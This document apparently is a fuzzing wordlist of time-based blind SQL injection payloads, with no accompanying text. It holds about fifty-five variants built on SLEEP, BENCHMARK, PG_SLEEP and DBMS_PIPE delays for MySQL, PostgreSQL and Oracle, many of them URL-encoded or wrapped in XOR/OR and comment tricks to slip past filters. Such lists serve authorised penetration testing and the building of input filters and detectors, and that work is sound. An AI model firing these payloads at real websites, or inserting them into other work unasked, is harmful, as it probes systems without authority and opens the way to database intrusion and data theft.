0%27XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR%27Z
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
0'or(now()=sysdate()&&SLEEP(10))or'Z
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
-10'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
1'%2b(select*from(select(sleep(10)))a)%2b'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(10))A))
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
'%2bbenchmark(10000000,sha1(1))%2b'
'%2b(select*from(select(sleep(10)))a)%2b'
%2c(select%5*%5from%5(select(sleep(10)))a)
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
BENCHMARK(10000000,MD5(CHAR(116)))
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
desc%2c(select*from(select(sleep(10)))a)
if(1=1,sleep(10),0)/*'XOR(if(1=1,sleep(10),0))OR'"XOR(if(1=1,sleep(10),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(10),0))OR"*/
if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22
if(now()=sysdate(),sleep(10),0)
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
(select(0)from(select(sleep(10)))v)
(select(0)from(select(sleep(10)))v)%2f'+(select(0)from(select(sleep(10)))v)+'"
(select(0)from(select(sleep(10)))v)%2f*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*%2f
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'\"+(select(0)from(select(sleep(10)))v)+\"*/
');(SELECT 4564 FROM PG_SLEEP(10))--
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
(select*from(select(sleep(10)))a)
(SELECT * FROM (SELECT(SLEEP(10)))a)
'+(select*from(select(sleep(10)))a)+'
(select*from(select(sleep(10)))a)
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)--
SLEEP(10)/*' or SLEEP(10) or '" or SLEEP(10) or "*/
',''),/*test*/%26%26%09sLeEp(10)%09--+
*'XOR(if(2=2,sleep(10),0))OR'
'XOR(if(now()=sysdate(),sleep(10),0))OR'
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
